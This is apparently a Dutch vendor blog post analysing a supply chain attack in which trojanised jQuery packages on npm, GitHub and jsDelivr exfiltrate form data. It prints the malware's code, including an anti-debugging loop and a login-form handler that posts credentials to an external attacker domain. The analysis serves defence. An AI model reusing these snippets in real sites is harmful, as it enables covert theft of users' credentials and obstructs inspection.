Blog Attacks

Web supply chain-aanval via getrojaniseerde jQuery op npm, GitHub en CDN's

Aanvallen zijn gevonden in getrojaniseerde jQuery op GitHub, npm en jsDelivr in een nieuwe web supply chain-aanval. Elk pakket had een kopie van jQuery

Jul 09, 2024 • 4 min read

Himanshu Anand Software Engineer

Screenshot van een kwaadaardig jQuery-script dat via jsDelivr wordt geleverd

Aanvallen zijn gevonden in getrojaniseerde jQuery op GitHub, npm en jsDelivr in een nieuwe web supply chain-aanval. Elk pakket had een kopie van jQuery met één kleine wijziging: de 'end'-functie. Dit maakt deel uit van het jQuery-prototype en werd aangepast om extra kwaadaardige code te bevatten.

In het kwaadaardige script stuurt de aanvaller een niet-blokkerende GET-aanvraag met '$.ajax' naar andere domeinen. De aanvraag-URL bevat een queryparameter, die verschilt tussen verschillende pakketten. Als gevolg hiervan worden alle formuliergegevens op de pagina geëxfiltreerd wanneer de end-functie wordt aangeroepen.

Dit werd eerst ontdekt op npm, later op meerdere GitHub-repositories en ook als een CDN-gehoste bron op jsDelivr.

In onze campagne getiteld supply chain-risico eindigt niet bij npm, benadrukken we dat de leveringsmethode van een script zoals dit dynamisch gedrag mogelijk maakt. Dit maakt het controleren van bronnen of vertrouwen op veilige betrouwbare leveringsmethoden alleen een riskant spel, zoals geïllustreerd door deze aanval. Dit misleidt vaak firewalls en stelt kwaadaardige code in staat om erdoorheen te glippen, en aanvallers zijn zich hier goed van bewust.

Wat we vonden

We haalden de kwaadaardige code op van de officiële jsDelivr CDN, die 37.000 hits per maand krijgt. Al deze bevatten de gewijzigde scripts en zijn onveilig.

jsDelivr CDN-pagina die het getrojaniseerde jQuery-script serveert

Dit is een deel van de kwaadaardige code die we vonden en wat het doet:

Getrojaniseerd jQuery-script dat wordt geserveerd via de jsDelivr-CDN

Dit deel van het script serialiseert formuliergegevens, converteert deze naar een hexadecimale string en stuurt deze naar een externe server met behulp van een GET-aanvraag, waardoor mogelijk gevoelige gebruikersinformatie wordt blootgesteld zonder toestemming. Het gebruik van $.ajax met een async-functie maakt deze gegevensoverdracht heimelijk, wat wijst op kwaadaardige activiteiten gericht op het stiekem verzamelen van gegevens.

1. Anti-Debugging Mechanisme:

Interval Functie: Een functie '_0x38c4a6' wordt elke 4 seconden uitgevoerd met behulp van 'setInterval'. Deze functie is bedoeld om debuggingpogingen te detecteren en te verstoren door gebruik te maken van JavaScript's 'debugger'-statement.
Geneste Functie: Binnen '_0x38c4a6' bevat de geneste functie '_0x386016' logica om herhaaldelijk 'debugger' aan te roepen op basis van bepaalde voorwaarden, waardoor het moeilijk wordt voor iemand om de code te debuggen met standaardtools.

(function () {
  setInterval(function () {
    function antiDebugging(_0x44dcc7) {
      if (typeof _0x44dcc7 === "string") {
        return function () {}.constructor("while (true) {}").apply("counter");
      } else {
        if (('' + _0x44dcc7 / _0x44dcc7).length !== 1 || _0x44dcc7 % 20 === 0) {
          (function () {
            return true;
          }).constructor("debugger").call("action");
        } else {
          (function () {
            return false;
          }).constructor("debugger").apply("stateObject");
        }
      }
      antiDebugging(++_0x44dcc7);
    }
    try {
      antiDebugging(0);
    } catch (e) {}
  }, 4000);
})();

2. Formulier Inzending Handler:

Formulier Selectie: Het script selecteert het formulier met de class '.login-form'.
Submit Event: Een event listener wordt gekoppeld aan het submit-event van het formulier.
AJAX Aanvraag: Wanneer het formulier wordt ingediend, wordt een AJAX POST-aanvraag verzonden naar 'https://koneksi.barux.my[.]id/index.php' met de geserialiseerde formuliergegevens.

$(".login-form").submit(function () {
  var form = $(".login-form");
  $.ajax({
    url: "https://koneksi.barux.my.id/index.php",
    type: "POST",
    data: form.serialize(),
    success: function () {
      return true;
    },
    error: function () {
      return true;
    }
  });
});

Dit suggereert samen dat het script mogelijk wordt gebruikt om manipulatie of inspectie te voorkomen (via de anti-debugging logica) terwijl stilletjes gegevens van een formulier naar een externe server worden verzonden. Deze gegevens kunnen gebruikersreferenties of andere soorten informatie zijn.

Zoals typisch is bij deze aanvallen, is het moeilijk te weten hoeveel mensen slachtoffer zijn geworden. De leveringsmethode van deze scripts maakt dynamisch gedrag mogelijk. Elke gebruiker kan elke keer een andere levering krijgen, vooral wanneer een script is gecompromitteerd. Het is dus ofwel volledig willekeurig, of zeer gericht en zo opgezet om lange tijd onopgemerkt te blijven.

In onderzoek gepubliceerd door Phylum, weten we dat de volgende domeinen werden gebruikt in deze aanval:

Wat kunt u doen

De tijd voor preventieve maatregelen is voorbij. Controleer onmiddellijk uw code op verwijzingen naar de getroffen repositories en domeinen. Indien gevonden, verwijder ze.

Aanvallen zoals deze waren vroeger onmogelijk te detecteren omdat ontwikkelaars die afhankelijk zijn van bronnen van derden niet altijd op de hoogte zijn van wijzigingen in de scripts zelf. Oudere detectiemethoden houden geen rekening met deze wijzigingen en hebben geen manier om ze te onderscheiden.

Door gebruik te maken van cside's gratis tier, wordt u gewaarschuwd wanneer een wijziging wordt aangebracht in het script zelf. We blokkeren alles wat kwaadaardig is autonoom, en u krijgt een volledig overzicht van de gedeobfusceerde scripts om te begrijpen wat ze leveren.

Begin vandaag nog gratis met cside.

Software Engineer Himanshu Anand

I'm a software engineer and security analyst.

Back to top

Don't just take our word for it, ask AI

FAQ

Frequently Asked Questions

Kwaadaardige jQuery-versies werden naar npm gepubliceerd, gespiegeld op GitHub en daarna via de jsDelivr-CDN uitgeserveerd — circa 37.000 hits per maand. Sites die jQuery via deze bronnen laadden, voerden code uit die formulierdata exfiltreerde via GET-verzoeken.

Pin op een specifieke versie met Subresource Integrity, of route het script via een monitor zoals cside zodat elke wijziging in de uitgeserveerde code wordt gedetecteerd en geblokkeerd voor het de gebruiker bereikt.

Monitor en Beveilig Je Third-Party Scripts

Gain full visibility and control over every script delivered to your users to enhance site security and performance.

Boek een demo

Start gratis

Start gratis, of probeer Business met een proefperiode van 14 dagen.

cside dashboard interface met script monitoring en beveiligingsanalytics

Het sneeuwbaleffect: hoe Mini Shai-Hulud npm verandert in een wormdistributienetwerk

Mini Shai-Hulud veranderde npm-pakketten in een lus voor credentialdiefstal. Zo verspreidde de AntV-golf zich.

Waarom CAPTCHAs geen betrouwbare botverdediging meer zijn

CAPTCHAs zijn geen betrouwbare primaire botverdediging meer. Lees waarom zichtbare challenges falen en aanvallers duurder worden.

Geillustreerde blogbanner over Funnull-sancties, infrastructuurwitwassen en browser supply-chain risico

Funnull gesanctioneerd: wat Polyfill[.]io liet zien over infrastructuurwitwassen

De sancties tegen Funnull tonen dat Polyfill deel was van een groter risico rond infrastructuurwitwassen.

Illustratie van een securitystack met on-device inference

On-device inference komt naar je securitystack: goed en slecht nieuws

Lokale AI kan gevoelige data beschermen en endpointbeveiliging versterken, maar brengt nieuwe risico's rond promptinjectie, telemetrie en browsers.

Donkere cside-blogcover met punten over tools voor detectie van AI-agents

4 tools om AI-agents op je website te detecteren (fraudepreventie)

Vergelijking van cside, HUMAN Security, DataDome en Cloudflare voor AI-agentdetectie. Ontdek hoe elke tool omgaat met fraudepreventie, prijzen en implementatie.

Donkere cside-blogcover met punten over het blokkeren van AI-creditcardtestbots

Creditcardtestbots op basis van AI-agents | Zo stop je ze

AI-agents voor creditcardtests gebruiken echte browsers om gestolen gegevens grootschalig te valideren. Leer ze te herkennen en te blokkeren vóór de betaling.

Donkere cside-blogcover met punten over gebruik en blokkering van stealth-browsers

Wat zijn stealth- (of 'anti-detect') browsers en wanneer moet je ze blokkeren

Stealth-browsers omzeilen botdetectie. Anti-detectbrowsers spoofen fingerprints. Leer de signalen die beide verraden, zelfs als ze er menselijk uitzien.

SourceForge Spring 2026 Top Performer-badge naast een cside-dashboardafbeelding

cside uitgeroepen tot SourceForge Spring 2026 Top Performer voor client-side security

cside is SourceForge Spring 2026 Top Performer, een signaal van gebruikersvertrouwen in client-side security en PCI-bewijs.

Donkere cside-blogcover met punten over detectie van AI-agentverkeer

Hoe AI-agents op je website detecteren | Volledige gids

Deze gids behandelt AI-agentdetectie via identiteits-, netwerk-, browser- en gedragssignalen. Bekijk gratis methoden zoals serverloganalyse en gespecialiseerde tools.

Blauwe netwerkbol en browsersecurity-iconen op een donkere cside-cover

cside is medevoorzitter van W3C-werk aan antifraude en browsersecurity

Simon Wijckmans is nu medevoorzitter van de W3C AFCG terwijl cside helpt privacyvriendelijke signalen tegen AI-fraude vorm te geven.